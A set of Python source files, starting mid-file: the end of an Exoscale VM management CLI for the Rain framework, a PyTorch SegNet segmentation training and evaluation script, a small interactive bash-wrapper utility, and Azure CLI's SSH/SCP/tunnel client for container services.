hosts = "\n".join(["{} {}".format(nodes[k], k) for k in nodes.keys()])
processes = []
for k in nodes.keys():
p = multiprocessing.Process(target=install_node, args=(k, nodes, hosts, pub_key))
p.start()
processes.append(p)
[p.join() for p in processes]
print("Rain installed")
def start(args):
nodes = get_nodes(args)
server_ip = list(nodes.values())[0]
os.popen("{} {}@{} \"rain start --governor-host-file ~/node-list\""
.format(SSH_CMD, SSH_USERNAME, server_ip))
print("Server IP: {}".format(list(nodes.values())[0]))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers(help="sub-command help")
parser_create = subparsers.add_parser("create", help="create help")
parser_create.add_argument("-n", help="Number of virtual machines", type=int, default=1)
parser_create.add_argument("--name", help="Virtual machine name prefix", default="default")
parser_create.add_argument("--env", help="Path to environment file", default="default.env")
parser_create.add_argument("--keypair", choices=SSH_KEY_PAIRS,
help="SSH key name", required=True)
parser_create.add_argument("--offering", choices=OFFERINGS.keys(), default="small",
help="Service offering")
parser_create.add_argument("--zone", choices=ZONES.keys(), default="at-vie-1", help="Zone")
parser_create.set_defaults(func=create)
parser_destroy = subparsers.add_parser("destroy", help="destroy help")
parser_destroy.add_argument("--env", help="Path to environment file", default="default.env")
parser_destroy.set_defaults(func=destroy)
parser_ips = subparsers.add_parser("list-nodes", help="list nodes")
parser_ips.add_argument("--env", help="Path to environment file", default="default.env")
parser_ips.set_defaults(func=list_ips)
parser_ssh = subparsers.add_parser("ssh", help="SSH into n-th node")
parser_ssh.add_argument("n", help="Node index", type=int)
parser_ssh.add_argument("--env", help="path to environment file", default="default.env")
parser_ssh.set_defaults(func=ssh)
parser_scp = subparsers.add_parser("scp", help="Secure copy data")
parser_scp.add_argument("src", help="Source path")
parser_scp.add_argument("dst", help="Destination path")
parser_scp.add_argument("--env", help="path to environment file", default="default.env")
parser_scp.add_argument("--n", help="Node index", type=int)
parser_scp.set_defaults(func=scp)
parser_cmd = subparsers.add_parser("cmd", help="Execute command")
parser_cmd.add_argument("cmd", help="Source path")
parser_cmd.add_argument("--env", help="path to environment file", default="default.env")
parser_cmd.add_argument("--n", help="Node index", type=int)
parser_cmd.set_defaults(func=cmd)
parser_install = subparsers.add_parser("install", help="install help")
parser_install.add_argument("--env", help="path to environment file", default="default.env")
parser_install.add_argument("--rain-download", help="rain release version")
parser_install.add_argument("--rain-binary", help="path to Rain binary")
parser_install.add_argument("--rain-wheel", help="path to Rain Python wheel")
parser_install.set_defaults(func=install)
parser_start = subparsers.add_parser("start", help="start help")
parser_start.add_argument("--env", help="path to environment file", default="default.env")
parser_start.add_argument("-S", help="passes -S to rain start command")
parser_start.set_defaults(func=start)
args = parser.parse_args()
args.func(args)
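# Example session (hypothetical values; assumes a valid cloudstack.ini for the
# `cs` library and an SSH key pair named "mykey" uploaded to the provider):
#
#   python exoscale.py create -n 3 --keypair mykey --offering medium
#   python exoscale.py install --env default.env --rain-download 0.4.0
#   python exoscale.py start --env default.env
#   python exoscale.py ssh 0 --env default.env
#   python exoscale.py destroy --env default.env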
|
segment.py
|
#!/shared/xudongliu/anaconda3/envs/f_torch04/bin/python
import argparse
import json
import logging
import os
import threading
from os.path import exists, join, split, dirname
import time
import numpy as np
import shutil
import sys
from PIL import Image
import torch
import torch.utils.data
from torch import nn
import torch.backends.cudnn as cudnn
from torch.autograd import Variable
import dla_up
import data_transforms as transforms
import dataset
from miou import RunningConfusionMatrix
from models.segnet_new import SegNet
try:
from modules import batchnormsync
HAS_BN_SYNC = True
except ImportError:
HAS_BN_SYNC = False
FORMAT = "[%(asctime)-15s %(filename)s:%(lineno)d %(funcName)s] %(message)s"
logging.basicConfig(format=FORMAT)
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
CITYSCAPE_PALLETE = np.asarray([
[128, 64, 128],
[244, 35, 232],
[70, 70, 70],
[102, 102, 156],
[190, 153, 153],
[153, 153, 153],
[250, 170, 30],
[220, 220, 0],
[107, 142, 35],
[152, 251, 152],
[70, 130, 180],
[220, 20, 60],
[255, 0, 0],
[0, 0, 142],
[0, 0, 70],
[0, 60, 100],
[0, 80, 100],
[0, 0, 230],
[119, 11, 32],
[0, 0, 0]], dtype=np.uint8)
class SegList(torch.utils.data.Dataset):
def __init__(self, data_dir, phase, transforms, list_dir=None,
out_name=False, out_size=False, binary=False):
self.list_dir = data_dir if list_dir is None else list_dir
self.data_dir = data_dir
self.out_name = out_name
self.phase = phase
self.transforms = transforms
self.image_list = None
self.label_list = None
self.bbox_list = None
self.out_size = out_size
self.binary = binary
self.read_lists()
def __getitem__(self, index):
image = Image.open(join(self.data_dir, self.image_list[index]))
data = [image]
if self.label_list is not None:
label_map = Image.open(join(self.data_dir, self.label_list[index]))
if self.binary:
label_map = Image.fromarray(
(np.array(label_map) > 0).astype(np.uint8))
data.append(label_map)
if self.bbox_list is not None:
data.append(Image.open(join(self.data_dir, self.bbox_list[index])))
data = list(self.transforms(*data))
if self.out_name:
if self.label_list is None:
data.append(data[0][0, :, :])
data.append(self.image_list[index])
if self.out_size:
data.append(torch.from_numpy(np.array(image.size, dtype=int)))
return tuple(data)
def __len__(self):
return len(self.image_list)
def read_lists(self):
image_path = join(self.list_dir, self.phase + '_images.txt')
label_path = join(self.list_dir, self.phase + '_labels.txt')
bbox_path = join(self.list_dir, self.phase + '_bboxes.txt')
assert exists(image_path)
self.image_list = [line.strip() for line in open(image_path, 'r')]
if exists(label_path):
self.label_list = [line.strip() for line in open(label_path, 'r')]
assert len(self.image_list) == len(self.label_list)
if exists(bbox_path):
self.bbox_list = [line.strip() for line in open(bbox_path, 'r')]
assert len(self.image_list) == len(self.bbox_list)
class SegListMS(torch.utils.data.Dataset):
def __init__(self, data_dir, phase, transforms, scales, list_dir=None):
self.list_dir = data_dir if list_dir is None else list_dir
self.data_dir = data_dir
self.phase = phase
self.transforms = transforms
self.image_list = None
self.label_list = None
self.bbox_list = None
self.read_lists()
self.scales = scales
def __getitem__(self, index):
data = [Image.open(join(self.data_dir, self.image_list[index]))]
w, h = data[0].size
if self.label_list is not None:
data.append(Image.open(join(self.data_dir,
self.label_list[index])))
# data = list(self.transforms(*data))
if len(data) > 1:
out_data = list(self.transforms(*data))
else:
out_data = [self.transforms(*data)]
ms_images = [self.transforms(data[0].resize((int(w * s), int(h * s)),
Image.BICUBIC))
for s in self.scales]
out_data.append(self.image_list[index])
out_data.extend(ms_images)
return tuple(out_data)
def __len__(self):
return len(self.image_list)
def read_lists(self):
image_path = join(self.list_dir, self.phase + '_images.txt')
label_path = join(self.list_dir, self.phase + '_labels.txt')
assert exists(image_path)
self.image_list = [line.strip() for line in open(image_path, 'r')]
if exists(label_path):
self.label_list = [line.strip() for line in open(label_path, 'r')]
assert len(self.image_list) == len(self.label_list)
def validate(val_loader, model, criterion, eval_score=None, print_freq=10):
# miou part >>>
confusion_labels = np.arange(0, 19)
confusion_matrix = RunningConfusionMatrix(confusion_labels)
# miou part <<<
batch_time = AverageMeter()
losses = AverageMeter()
score = AverageMeter()
# switch to evaluate mode
model.eval()
end = time.time()
for i, (input, target) in enumerate(val_loader):
if type(criterion) in [torch.nn.modules.loss.L1Loss,
torch.nn.modules.loss.MSELoss]:
target = target.float()
input = input.cuda()
        target = target.cuda(non_blocking=True)  # 'async' is a reserved word on Python 3.7+
input_var = torch.autograd.Variable(input, volatile=True)
target_var = torch.autograd.Variable(target, volatile=True)
# compute output
output = model(input_var)
loss = criterion(output, target_var)
confusion_matrix.update_matrix(target, output)
# measure accuracy and record loss
# prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
losses.update(loss.data[0], input.size(0))
if eval_score is not None:
score.update(eval_score(output, target_var), input.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % print_freq == 0:
print('Test: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Score {score.val:.3f} ({score.avg:.3f})'.format(
i, len(val_loader), batch_time=batch_time, loss=losses,
score=score), flush=True)
miou, top_1, top_5 = confusion_matrix.compute_current_mean_intersection_over_union()
print(' * Score {top1.avg:.3f}'.format(top1=score))
print(' * mIoU {top1:.3f}'.format(top1=miou))
confusion_matrix.show_classes()
return miou
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def accuracy(output, target):
"""Computes the precision@k for the specified values of k"""
# batch_size = target.size(0) * target.size(1) * target.size(2)
_, pred = output.max(1)
pred = pred.view(1, -1)
target = target.view(1, -1)
correct = pred.eq(target)
correct = correct[target != 255]
correct = correct.view(-1)
score = correct.float().sum(0).mul(100.0 / correct.size(0))
return score.data[0]
def train(train_loader, model, criterion, optimizer, epoch,
eval_score=None, print_freq=10):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
scores = AverageMeter()
# switch to train mode
model.train()
end = time.time()
for i, (input, target) in enumerate(train_loader):
# measure data loading time
data_time.update(time.time() - end)
# pdb.set_trace()
if type(criterion) in [torch.nn.modules.loss.L1Loss,
torch.nn.modules.loss.MSELoss]:
target = target.float()
input = input.cuda()
        target = target.cuda(non_blocking=True)  # 'async' is a reserved word on Python 3.7+
input_var = torch.autograd.Variable(input)
target_var = torch.autograd.Variable(target)
# compute output
output = model(input_var)
loss = criterion(output, target_var)
# measure accuracy and record loss
# prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
losses.update(loss.data[0], input.size(0))
if eval_score is not None:
scores.update(eval_score(output, target_var), input.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % print_freq == 0:
print('Epoch: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Score {top1.val:.3f} ({top1.avg:.3f})'.format(
epoch, i, len(train_loader), batch_time=batch_time,
data_time=data_time, loss=losses, top1=scores))
def save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):
args = parse_args()
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, join(args.checkpoint_dir, 'model_best.pth.tar'))
def train_seg(args):
batch_size = args.batch_size
num_workers = args.workers
crop_size = args.crop_size
checkpoint_dir = args.checkpoint_dir
print(' '.join(sys.argv))
for k, v in args.__dict__.items():
print(k, ':', v)
pretrained_base = args.pretrained_base
single_model = SegNet(args.classes)
# single_model = dla_up.__dict__.get(args.arch)(
# args.classes, pretrained_base, down_ratio=args.down)
model = torch.nn.DataParallel(single_model).cuda()
if args.edge_weight > 0:
weight = torch.from_numpy(
np.array([1, args.edge_weight], dtype=np.float32))
criterion = nn.NLLLoss2d(ignore_index=255, weight=weight)
else:
criterion = nn.NLLLoss2d(ignore_index=255)
criterion.cuda()
data_dir = args.data_dir
info = dataset.load_dataset_info(data_dir)
normalize = transforms.Normalize(mean=info.mean, std=info.std)
t = []
if args.random_rotate > 0:
t.append(transforms.RandomRotate(args.random_rotate))
if args.random_scale > 0:
t.append(transforms.RandomScale(args.random_scale))
t.append(transforms.RandomCrop(crop_size))
if args.random_color:
t.append(transforms.RandomJitter(0.4, 0.4, 0.4))
t.extend([transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize])
train_loader = torch.utils.data.DataLoader(
SegList(data_dir, 'train', transforms.Compose(t),
binary=(args.classes == 2)),
batch_size=batch_size, shuffle=True, num_workers=num_workers,
pin_memory=True
)
val_loader = torch.utils.data.DataLoader(
SegList(data_dir, 'val', transforms.Compose([
transforms.RandomCrop(crop_size),
# transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize,
]), binary=(args.classes == 2)),
batch_size=4, shuffle=False, num_workers=num_workers,
pin_memory=True
)
optimizer = torch.optim.SGD(single_model.parameters(),
args.lr,
momentum=args.momentum,
weight_decay=args.weight_decay)
cudnn.benchmark = True
best_prec1 = 0
start_epoch = 0
# optionally resume from a checkpoint
if args.resume:
if os.path.isfile(args.resume):
print("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
start_epoch = checkpoint['epoch']
best_prec1 = checkpoint['best_prec1']
model.load_state_dict(checkpoint['state_dict'])
print("=> loaded checkpoint '{}' (epoch {})"
.format(args.resume, checkpoint['epoch']))
else:
print("=> no checkpoint found at '{}'".format(args.resume))
if args.evaluate:
validate(val_loader, model, criterion, eval_score=accuracy)
return
for epoch in range(start_epoch, args.epochs):
lr = adjust_learning_rate(args, optimizer, epoch)
print('Epoch: [{0}]\tlr {1:.06f}'.format(epoch, lr))
# prec1 = validate(val_loader, model, criterion, eval_score=accuracy)
# train for one epoch
train(train_loader, model, criterion, optimizer, epoch,
eval_score=accuracy)
# evaluate on validation set
prec1 = validate(val_loader, model, criterion, eval_score=accuracy)
is_best = prec1 > best_prec1
best_prec1 = max(prec1, best_prec1)
# checkpoint_path = 'checkpoint_latest.pth.tar'
        checkpoint_path = os.path.join(checkpoint_dir, 'checkpoint_{}.pth.tar'.format(epoch))
save_checkpoint({
'epoch': epoch + 1,
'arch': args.arch,
'state_dict': model.state_dict(),
'best_prec1': best_prec1,
'prec1': prec1,
}, is_best, filename=checkpoint_path)
if (epoch + 1) % args.save_freq == 0:
history_path = os.path.join(checkpoint_dir, 'checkpoint_{:03d}.pth.tar'.format(epoch + 1))
shutil.copyfile(checkpoint_path, history_path)
def adjust_learning_rate(args, optimizer, epoch):
"""Sets the learning rate to the initial LR decayed by 10
every 30 epochs"""
if args.lr_mode == 'step':
lr = args.lr * (0.1 ** (epoch // args.step))
elif args.lr_mode == 'poly':
lr = args.lr * (1 - epoch / args.epochs) ** 0.9
else:
raise ValueError('Unknown lr mode {}'.format(args.lr_mode))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
return lr
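# Worked example of the two schedules (assuming args.lr=0.01, args.step=200,
# args.epochs=500): 'step' mode yields 0.01 for epochs 0-199, 0.001 for
# 200-399, and 0.0001 from epoch 400 on; 'poly' mode decays smoothly, e.g.
# epoch 250 gives 0.01 * (1 - 250/500) ** 0.9 ~= 0.0054.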
def fast_hist(pred, label, n):
k = (label >= 0) & (label < n)
return np.bincount(
n * label[k].astype(int) + pred[k], minlength=n ** 2).reshape(n, n)
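# Tiny worked example of the bincount trick in fast_hist (n=2 classes):
# label=[0,0,1,1], pred=[0,1,1,1] encodes to n*label+pred = [0,1,3,3], and
# np.bincount(..., minlength=4).reshape(2,2) gives [[1,1],[0,2]]: rows are
# ground-truth classes, columns are predictions. per_class_iu below then
# reads IoU as diag / (row_sum + col_sum - diag) = [0.5, 2/3] for this case.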
def per_class_iu(hist):
return np.diag(hist) / (hist.sum(1) + hist.sum(0) - np.diag(hist))
def crop_image(image, size):
left = (image.size[0] - size[0]) // 2
upper = (image.size[1] - size[1]) // 2
right = left + size[0]
lower = upper + size[1]
# print(left.item(), upper.item(), right.item(), lower.item())
return image.crop((left.item(), upper.item(), right.item(), lower.item()))
def save_output_images(predictions, filenames, output_dir, sizes=None):
"""
Saves a given (B x C x H x W) into an image file.
If given a mini-batch tensor, will save the tensor as a grid of images.
"""
# pdb.set_trace()
for ind in range(len(filenames)):
im = Image.fromarray(predictions[ind].astype(np.uint8))
if sizes is not None:
im = crop_image(im, sizes[ind])
fn = os.path.join(output_dir, filenames[ind][:-4] + '.png')
out_dir = split(fn)[0]
if not exists(out_dir):
os.makedirs(out_dir)
im.save(fn)
def save_prob_images(prob, filenames, output_dir, sizes=None):
for ind in range(len(filenames)):
im = Image.fromarray(
(prob[ind][1].squeeze().data.cpu().numpy() * 255).astype(np.uint8))
if sizes is not None:
im = crop_image(im, sizes[ind])
fn = os.path.join(output_dir, filenames[ind][:-4] + '.png')
out_dir = split(fn)[0]
if not exists(out_dir):
os.makedirs(out_dir)
im.save(fn)
def save_colorful_images(predictions, filenames, output_dir, palettes, sizes=None):
"""
Saves a given (B x C x H x W) into an image file.
If given a mini-batch tensor, will save the tensor as a grid of images.
"""
for ind in range(len(filenames)):
im = Image.fromarray(palettes[predictions[ind].squeeze()])
if sizes is not None:
im = crop_image(im, sizes[ind])
fn = os.path.join(output_dir, filenames[ind][:-4] + '.png')
out_dir = split(fn)[0]
if not exists(out_dir):
os.makedirs(out_dir)
im.save(fn)
def test(eval_data_loader, model, num_classes,
output_dir='pred', has_gt=True, save_vis=False):
model.eval()
batch_time = AverageMeter()
data_time = AverageMeter()
end = time.time()
hist = np.zeros((num_classes, num_classes))
for iter, (image, label, name, size) in enumerate(eval_data_loader):
data_time.update(time.time() - end)
image_var = Variable(image, requires_grad=False, volatile=True)
final = model(image_var)
_, pred = torch.max(final, 1)
pred = pred.cpu().data.numpy()
batch_time.update(time.time() - end)
prob = torch.exp(final)
if save_vis:
save_output_images(pred, name, output_dir, size)
if prob.size(1) == 2:
save_prob_images(prob, name, output_dir + '_prob', size)
else:
save_colorful_images(pred, name, output_dir + '_color',
CITYSCAPE_PALLETE, size)
if has_gt:
label = label.numpy()
hist += fast_hist(pred.flatten(), label.flatten(), num_classes)
            print('===> mIoU {miou:.3f}'.format(
                miou=round(np.nanmean(per_class_iu(hist)) * 100, 2)))
end = time.time()
print('Eval: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
.format(iter, len(eval_data_loader), batch_time=batch_time,
data_time=data_time))
ious = per_class_iu(hist) * 100
print(' '.join('{:.03f}'.format(i) for i in ious))
if has_gt: # val
return round(np.nanmean(ious), 2)
def resize_4d_tensor(tensor, width, height):
tensor_cpu = tensor.cpu().numpy()
if tensor.size(2) == height and tensor.size(3) == width:
return tensor_cpu
out_size = (tensor.size(0), tensor.size(1), height, width)
out = np.empty(out_size, dtype=np.float32)
def resize_one(i, j):
out[i, j] = np.array(
Image.fromarray(tensor_cpu[i, j]).resize(
(width, height), Image.BILINEAR))
def resize_channel(j):
for i in range(tensor.size(0)):
out[i, j] = np.array(
Image.fromarray(tensor_cpu[i, j]).resize(
(width, height), Image.BILINEAR))
workers = [threading.Thread(target=resize_channel, args=(j,))
for j in range(tensor.size(1))]
for w in workers:
w.start()
for w in workers:
w.join()
return out
def test_ms(eval_data_loader, model, num_classes, scales,
output_dir='pred', has_gt=True, save_vis=False):
model.eval()
batch_time = AverageMeter()
data_time = AverageMeter()
end = time.time()
hist = np.zeros((num_classes, num_classes))
num_scales = len(scales)
for iter, input_data in enumerate(eval_data_loader):
data_time.update(time.time() - end)
if has_gt:
name = input_data[2]
label = input_data[1]
else:
name = input_data[1]
h, w = input_data[0].size()[2:4]
images = [input_data[0]]
images.extend(input_data[-num_scales:])
outputs = []
for image in images:
image_var = Variable(image, requires_grad=False, volatile=True)
final = model(image_var)
outputs.append(final.data)
final = sum([resize_4d_tensor(out, w, h) for out in outputs])
pred = final.argmax(axis=1)
batch_time.update(time.time() - end)
if save_vis:
save_output_images(pred, name, output_dir)
save_colorful_images(pred, name, output_dir + '_color',
CITYSCAPE_PALLETE)
if has_gt:
label = label.numpy()
hist += fast_hist(pred.flatten(), label.flatten(), num_classes)
            logger.info('===> mIoU {miou:.3f}'.format(
                miou=round(np.nanmean(per_class_iu(hist)) * 100, 2)))
end = time.time()
logger.info('Eval: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
.format(iter, len(eval_data_loader), batch_time=batch_time,
data_time=data_time))
if has_gt: # val
ious = per_class_iu(hist) * 100
logger.info(' '.join('{:.03f}'.format(i) for i in ious))
return round(np.nanmean(ious), 2)
def test_seg(args):
batch_size = args.batch_size
num_workers = args.workers
phase = args.phase
base_out_dir = args.checkpoint_dir
for k, v in args.__dict__.items():
print(k, ':', v)
single_model = SegNet(args.classes)
# single_model = dla_up.__dict__.get(args.arch)(
# args.classes, down_ratio=args.down)
model = torch.nn.DataParallel(single_model).cuda()
data_dir = args.data_dir
info = dataset.load_dataset_info(data_dir)
normalize = transforms.Normalize(mean=info.mean, std=info.std)
# scales = [0.5, 0.75, 1.25, 1.5, 1.75]
scales = [0.5, 0.75, 1.25, 1.5]
t = []
if args.crop_size > 0:
t.append(transforms.PadToSize(args.crop_size))
t.extend([transforms.ToTensor(), normalize])
if args.ms:
data = SegListMS(data_dir, phase, transforms.Compose(t), scales)
else:
data = SegList(data_dir, phase, transforms.Compose(t),
out_name=True, out_size=True,
binary=args.classes == 2)
test_loader = torch.utils.data.DataLoader(
data,
batch_size=batch_size, shuffle=False, num_workers=num_workers,
pin_memory=False
)
cudnn.benchmark = True
# optionally resume from a checkpoint
start_epoch = 0
if args.resume:
if os.path.isfile(args.resume):
print("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
start_epoch = checkpoint['epoch']
best_prec1 = checkpoint['best_prec1']
model.load_state_dict(checkpoint['state_dict'])
print("=> loaded checkpoint '{}' (epoch {})"
.format(args.resume, checkpoint['epoch']))
else:
print("=> no checkpoint found at '{}'".format(args.resume))
out_dir = os.path.join(base_out_dir, '{}_{:03d}_{}'.format(args.arch, start_epoch, phase))
if len(args.test_suffix) > 0:
out_dir += '_' + args.test_suffix
if args.ms:
out_dir += '_ms'
    if args.ms:
        miou = test_ms(test_loader, model, args.classes, save_vis=True,
                       has_gt=phase != 'test' or args.with_gt,
                       output_dir=out_dir,
                       scales=scales)
    else:
        miou = test(test_loader, model, args.classes, save_vis=True,
                    has_gt=phase != 'test' or args.with_gt, output_dir=out_dir)
    print('mIoU: ', miou)
def parse_args():
# Training settings
parser = argparse.ArgumentParser(
description='DLA Segmentation and Boundary Prediction')
parser.add_argument('cmd', choices=['train', 'test'])
parser.add_argument('-d', '--data-dir', default=None)
parser.add_argument('-c', '--classes', default=0, type=int)
parser.add_argument('-s', '--crop-size', default=0, type=int)
parser.add_argument('--step', type=int, default=200)
parser.add_argument('--arch')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--train-samples', default=16000, type=int)
parser.add_argument('--loss', default='l1', type=str)
parser.add_argument('--test-batch-size', type=int, default=1000,
metavar='N',
help='input batch size for testing (default: 1000)')
parser.add_argument('--epochs', type=int, default=10, metavar='N',
help='number of epochs to train (default: 10)')
parser.add_argument('--lr', type=float, default=0.01, metavar='LR',
help='learning rate (default: 0.01)')
parser.add_argument('--momentum', type=float, default=0.9, metavar='M',
help='SGD momentum (default: 0.9)')
parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,
metavar='W', help='weight decay (default: 1e-4)')
parser.add_argument('-e', '--evaluate', dest='evaluate',
action='store_true',
help='evaluate model on validation set')
parser.add_argument('--no-cuda', action='store_true', default=False,
                        help='disables CUDA training')
parser.add_argument('--seed', type=int, default=1, metavar='S',
                        help='random seed (default: 1)')
parser.add_argument('--log-interval', type=int, default=1, metavar='N',
help='how many batches to wait before logging '
'training status')
parser.add_argument('--resume', default='', type=str, metavar='PATH',
help='path to latest checkpoint (default: none)')
parser.add_argument('--pretrained-base', default=None,
help='use pre-trained model')
parser.add_argument('-j', '--workers', type=int, default=8)
parser.add_argument('--down', default=2, type=int, choices=[2, 4, 8, 16],
help='Downsampling ratio of IDA network output, which '
'is then upsampled to the original resolution '
'with bilinear interpolation.')
parser.add_argument('--load-release', dest='load_rel', default=None)
parser.add_argument('--phase', default='val')
parser.add_argument('--lr-mode', default='step')
parser.add_argument('--bn-sync', action='store_true', default=False)
parser.add_argument('--random-scale', default=0, type=float)
parser.add_argument('--random-rotate', default=0, type=int)
parser.add_argument('--random-color', action='store_true', default=False)
parser.add_argument('--save-freq', default=10, type=int)
parser.add_argument('--ms', action='store_true', default=False)
parser.add_argument('--edge-weight', type=int, default=-1)
parser.add_argument('--test-suffix', default='')
parser.add_argument('--with-gt', action='store_true')
parser.add_argument('-o', '--checkpoint-dir')
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
assert args.data_dir is not None
assert args.classes > 0
print(' '.join(sys.argv))
print(args)
return args
def main():
args = parse_args()
if not exists(args.checkpoint_dir):
os.makedirs(args.checkpoint_dir)
if args.bn_sync:
if HAS_BN_SYNC:
dla_up.set_bn(batchnormsync.BatchNormSync)
else:
print('batch normalization synchronization across GPUs '
'is not imported.')
if args.cmd == 'train':
train_seg(args)
elif args.cmd == 'test':
test_seg(args)
if __name__ == '__main__':
main()
|
basher.py
|
from subprocess import Popen, PIPE
from threading import Thread
SHELL = False
CMD = ['/bin/bash', '-i']
# CMD = ['/usr/local/bin/python3.7', '-i']
def main():
sub = Popen(CMD, stdin=PIPE, stdout=PIPE, stderr=PIPE, encoding='utf8')
def new_thread(stream, prefix):
def read():
line = '.'
while line or sub.poll() is None:
line = stream.readline().rstrip('\n')
print(prefix, line)
thread = Thread(target=read, daemon=True)
thread.start()
return thread
new_thread(sub.stdout, '.')
new_thread(sub.stderr, '!')
while True:
s = input(': ')
if s:
sub.stdin.write(s + '\n')
sub.stdin.flush()
else:
break
if __name__ == '__main__':
main()
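# Example interaction (':' prompts for input; '.' and '!' prefix the child
# shell's stdout and stderr lines; an empty input ends the session):
#
#   : echo hello
#   . hello
#   : ls /nope
#   ! ls: cannot access '/nope': No such file or directory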
|
acs_client.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import socket
import threading
from time import sleep
from os.path import expanduser, join, isfile
import paramiko
import paramiko.agent
from sshtunnel import SSHTunnelForwarder
from scp import SCPClient
from azure.cli.core.util import CLIError
from azure.cli.core.prompting import prompt_pass
def _load_key(key_filename):
pkey = None
try:
pkey = paramiko.RSAKey.from_private_key_file(key_filename, None)
except paramiko.PasswordRequiredException:
key_pass = prompt_pass('Password for private key:')
pkey = paramiko.RSAKey.from_private_key_file(key_filename, key_pass)
if pkey is None:
raise CLIError('failed to load key: {}'.format(key_filename))
return pkey
def _load_keys(key_filename=None, allow_agent=True):
keys = []
default_key_path = join(expanduser("~"), '.ssh', 'id_rsa')
if key_filename is not None:
key = _load_key(key_filename)
keys.append(key)
if allow_agent:
agent = paramiko.agent.Agent()
for key in agent.get_keys():
keys.append(key)
if not keys and isfile(default_key_path):
key = _load_key(default_key_path)
keys.append(key)
if not keys:
raise CLIError('No keys available in ssh agent or no key in {}. '
'Do you need to add keys to your ssh agent via '
'ssh-add or specify a --ssh-key-file?'.format(default_key_path))
return keys
def secure_copy(user, host, src, dest, key_filename=None, allow_agent=True):
keys = _load_keys(key_filename, allow_agent)
pkey = keys[0]
ssh = paramiko.SSHClient()
ssh.load_system_host_keys()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(host, username=user, pkey=pkey)
scp = SCPClient(ssh.get_transport())
scp.get(src, dest)
scp.close()
class ACSClient(object):
def __init__(self, client=None):
self.client = client
self.transport = None
self.tunnel_server = None
self.host = None
self.username = None
self.port = None
def __del__(self):
if self.transport is not None:
self.transport.close()
if self.client is not None:
self.client.close()
if self.tunnel_server is not None:
self.tunnel_server.close_tunnel()
def connect(self, host, username, port=2200,
key_filename=None):
"""
Creates a connection to the remote server.
:param host: Remote host
:type host: String
:param username: User name to connect to the remote host
:type username: String
        :param port: Remote host port
        :type port: Number
        :param key_filename: Path to a private key file; if None, paramiko
            falls back to the ssh agent and default keys
        :type key_filename: String
        """
if not host:
raise ValueError('Host is missing')
if not username:
raise ValueError('Username is missing')
if not port:
raise ValueError('Missing port')
self.host = host
self.username = username
self.port = port
if self.client is None:
self.client = paramiko.SSHClient()
self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
pkey = None
if key_filename is not None:
pkey = _load_key(key_filename)
self.client.connect(
hostname=host,
port=port,
username=username,
pkey=pkey)
self.transport = self.client.get_transport()
return self.transport is not None
def run(self, command, background=False):
"""
Runs a command on the remote host
:param command: Command to run on the remote host
:type command: String
:param background: True to run it in a separate thread,
False should be run in the foreground
:type command: Boolean
"""
if background:
t = threading.Thread(target=ACSClient._run_cmd, args=(self, command))
t.daemon = True
t.start()
return
return self._run_cmd(command)
def _run_cmd(self, command):
"""
Runs a command on the remote host
:param command: Command to run on the remote host
:type command: String
"""
if not command:
raise ValueError('Command is missing')
_, stdout, stderr = self.client.exec_command(command)
return stdout, stderr
def file_exists(self, file_path):
"""
Checks if file on the remote exists
:param file_path: Full path to the file on remote machine
:type file_path: String
"""
if not file_path:
raise ValueError('Missing file path')
if self.transport is None:
raise TypeError('Transport cannot be none')
sftp = self.transport.open_sftp_client()
result = None
try:
sftp.stat(file_path)
result = True
except IOError:
result = False
finally:
sftp.close()
return result
def create_tunnel(self, remote_host, remote_port, local_port=0):
"""
Creates a tunnel to the remote host
:param remote_host: Remote host to tunnel to
:type remote_host: String
:param remote_port: Remote port to tunnel to
:type remote_port: Number
:param local_port: Local port. If set to 0, random local port is selected
:type local_port: Number
"""
        if local_port == 0:
local_port = self.get_available_local_port()
with SSHTunnelForwarder((self.host, self.port),
ssh_username=self.username,
remote_bind_address=(remote_host, remote_port),
local_bind_address=('0.0.0.0', local_port)):
try:
while True:
sleep(1)
except KeyboardInterrupt:
pass
@staticmethod
def get_available_local_port():
"""
Gets a random, available local port
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # pylint: disable=no-member
s.bind(('', 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
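# Minimal usage sketch (hypothetical host and username; assumes a key is
# available via the ssh agent or ~/.ssh/id_rsa):
#
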